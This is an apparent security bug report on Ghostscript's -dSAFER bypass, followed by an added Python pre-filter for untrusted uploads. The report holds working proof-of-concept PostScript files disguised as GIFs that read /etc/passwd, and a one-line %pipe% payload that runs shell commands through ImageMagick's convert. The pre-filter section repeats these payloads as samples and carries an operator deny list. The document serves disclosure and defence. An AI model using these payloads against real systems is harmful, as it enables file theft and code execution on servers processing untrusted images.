Status: Fixed
Closed: Sep 2016
ghostscript: -dSAFER stopped working
Project Member Reported by taviso@google.com, Sep 29 2016
During a mailing list discussion I noticed that -dSAFER, a ghostscript parameter that is used when handling untrusted documents, was broken on RHEL, Debian and Ubuntu (maybe more).

Some more investigation revealed that the bug was already fixed upstream, but because they never allocated a CVE or informed distributions about the security impact, many distributions didn't update.

This could result in arbitrary file disclosure on systems that process pdf, ps, use ImageMagick or graphicsmagick, etc. You can easily imagine other complicated attacks on non-automated systems by modifying output based on file contents, etc.

The bug is already public, just recording here for reference.

Use of ghostscript as a backend with -dSAFER is extremely common:

https://codesearch.debian.net/search?q=-dSAFER&perpkg=1

$ cat test.gif
%!PS
/Font /Helvetica-Bold findfont def
/FontSize 12 def
Font FontSize scalefont setfont

/dumpname {
    dup             % copy filename
    dup             % copy filename
    print           % print filename
    (\n) print      % print newline
    status          % stat filename
    {
        (stat succeeded\n) print
        ( ctime:) print
        64 string cvs print
        ( atime:) print
        64 string cvs print
        ( size:) print
        64 string cvs print
        ( blocks:) print
        64 string cvs print
        (\n) print
        (\n) print
    }{
        (unable to stat\n\n) print
    } ifelse
    .libfile        % open as library
    {
        (.libfile returned file\n\n) print
        64 string readstring
        pop         % discard result (should probably test)
        dup         % copy read string
        print       % write to stdout
        % write to output
        newpath 0 0 moveto show showpage
        (\n) print
    }{
        (.libfile returned string\n) print
        print
        (\n) print
    } ifelse
} def

(/etc/passwd) /dumpname load 256 string filenameforall
$ convert test.gif png:test.png
<creates a file called test.png containing first line of /etc/passwd>
Project Member Comment 1 by taviso@google.com, Sep 29 2016
Labels: -Restrict-View-Commit
Project Member Comment 2 by taviso@google.com, Sep 29 2016
Summary: ghostscript: -dSAFER stopped working (was: ghsotscript: -dSAFER stopped working)
Project Member Comment 3 by taviso@google.com, Sep 30 2016
Here's a more complete example test file.
Attachment: test.gif (605 bytes)
Project Member Comment 4 by taviso@google.com, Sep 30 2016
$ cat test.gif
%!PS
/Size 20 def                             % font/line size
/Line 0 def                              % current line
/Buf 1024 string def                     % line buffer
/Path 0 newpath def

/Courier-Bold findfont Size scalefont setfont
1 1 1 setrgbcolor clippath fill          % draw white background
0 0 0 setrgbcolor                        % set black foreground

(/etc/passwd) .libfile {
    {
        dup Buf readline
        {
            Path Line moveto show
        }{
            showpage
            quit
        } ifelse
        % next line
        /Line Line Size add def
    } loop
} if

Project Member Comment 5 by taviso@google.com, Sep 30 2016
I noticed a way to get command execution in version 9.18 and higher:

$ cat test.gif
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty) .putdeviceparams
quit
$ convert test.gif png:test.png
uid=1000(taviso)

Should also work in evince, gimp, graphicsmagick, etc.
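A pre-filter one could put in front of a convert/gs pipeline that accepts untrusted uploads, added here as an example; it is not code from this issue, from Ghostscript or from ImageMagick. It lexes the input as PostScript and rejects it when PS/PDF content arrives under a raster extension (ImageMagick picks the coder from the magic bytes, which is why the PoCs above run from a file called test.gif), or when the input uses the primitives the posted files rely on: .libfile, status and filenameforall for file disclosure (the report and comment 4) and a %pipe% target set through .putdeviceparams (comment 5). The operator list, the extension set and the sample inputs (condensed from the posted PoCs, plus two benign files) are assumptions made for the example.

```python
# Added example: a pre-filter for untrusted files headed to convert/gs.
# Not code from this issue, Ghostscript or ImageMagick; operator list,
# extension set and sample inputs are assumptions made for the example.
from dataclasses import dataclass, field

PS_MAGIC = (b"%!", b"%PDF-")              # headers ImageMagick routes to gs
PS_EXTENSIONS = {"ps", "eps", "pdf"}      # where PostScript content is expected

# Operators from the PoCs in this issue plus the other file primitives -dSAFER
# is meant to gate; in untrusted input they are grounds for rejection whatever
# the state of the installed gs.
SUSPICIOUS_OPERATORS = {
    ".libfile", "status", "filenameforall", ".putdeviceparams",
    "file", "deletefile", "renamefile",
}
# IODevice prefixes that reach the OS when used as a file/device target.
SUSPICIOUS_DEVICE_PREFIXES = ("%pipe%", "%os%")


@dataclass
class ScanResult:
    is_postscript: bool                       # header says PS/PDF
    ext_mismatch: bool                        # PS/PDF content under a raster extension
    operators: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    @property
    def reject(self) -> bool:
        return self.ext_mismatch or bool(self.operators) or bool(self.strings)


def tokenize(src: str):
    """Minimal PostScript lexer: yields ("name", tok) for executable and
    literal names, ("string", text) for (...) and <hex> literals. Comments
    are dropped; <~ASCII85~> strings are skipped, not decoded."""
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c.isspace():
            i += 1
        elif c == "%":                                   # comment to end of line
            j = src.find("\n", i)
            i = n if j < 0 else j + 1
        elif c == "(":                                   # nested parens, \ escapes
            depth, j, buf = 1, i + 1, []
            while j < n and depth:
                ch = src[j]
                if ch == "\\" and j + 1 < n:
                    buf.append(src[j + 1]); j += 2; continue
                if ch == "(":
                    depth += 1
                elif ch == ")":
                    depth -= 1
                    if depth == 0:
                        j += 1
                        break
                buf.append(ch); j += 1
            yield ("string", "".join(buf))
            i = j
        elif src.startswith(("<<", ">>", "<~"), i):       # dict delimiters, ASCII85 open
            i += 2
        elif c == "<":                                   # <hex> string
            j = src.find(">", i)
            j = n if j < 0 else j
            digits = "".join(src[i + 1:j].split())
            try:
                yield ("string", bytes.fromhex(digits + "0" * (len(digits) % 2)).decode("latin-1"))
            except ValueError:
                pass
            i = j + 1
        elif c in "{}[]>)":                              # remaining delimiters
            i += 1
        else:                                            # name, optionally /literal
            j = i + 1 if c == "/" else i
            while j < n and not src[j].isspace() and src[j] not in "(){}[]<>%/":
                j += 1
            yield ("name", src[i:j].lstrip("/"))
            i = j


def scan(data: bytes, declared_ext: str) -> ScanResult:
    """Classify one input; declared_ext is the extension the pipeline trusts."""
    is_ps = data.lstrip().startswith(PS_MAGIC)
    res = ScanResult(is_postscript=is_ps,
                     ext_mismatch=is_ps and declared_ext.lower() not in PS_EXTENSIONS)
    # Lex everything, not only self-declared PS: the comment 5 PoC has no %! line.
    for kind, val in tokenize(data.decode("latin-1")):
        if kind == "name" and val in SUSPICIOUS_OPERATORS and val not in res.operators:
            res.operators.append(val)
        elif kind == "string" and val.startswith(SUSPICIOUS_DEVICE_PREFIXES) and val not in res.strings:
            res.strings.append(val)
    return res


# Constructed samples: condensed from the PoCs posted above, plus benign files.
POC_STAT = b"%!PS\n(/etc/passwd) { dup print status { pop pop pop pop } if } 256 string filenameforall\n"
POC_LIBFILE = b"%!PS\n(/etc/passwd) .libfile { 1024 string readline pop print } if\n"
POC_PIPE = b"currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty) .putdeviceparams\nquit\n"
BENIGN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
BENIGN_PS = b"%!PS\n/Helvetica findfont 12 scalefont setfont\n72 72 moveto (hello) show showpage\n"
```

Call `scan(POC_PIPE, "gif").reject` (True, with `.putdeviceparams` and the `%pipe%id > /dev/tty` string reported) or `scan(BENIGN_PS, "ps").reject` (False) to try it. This is a pre-filter, not the fix: a document that builds operator names at runtime (concatenating strings and `cvn cvx`) or hides its strings in ASCII85, which this lexer does not decode, gets past it. Update ghostscript, and where PostScript input is not needed at all, disable the PS/EPS/PDF coders in ImageMagick's policy.xml so nothing reaches gs in the first place.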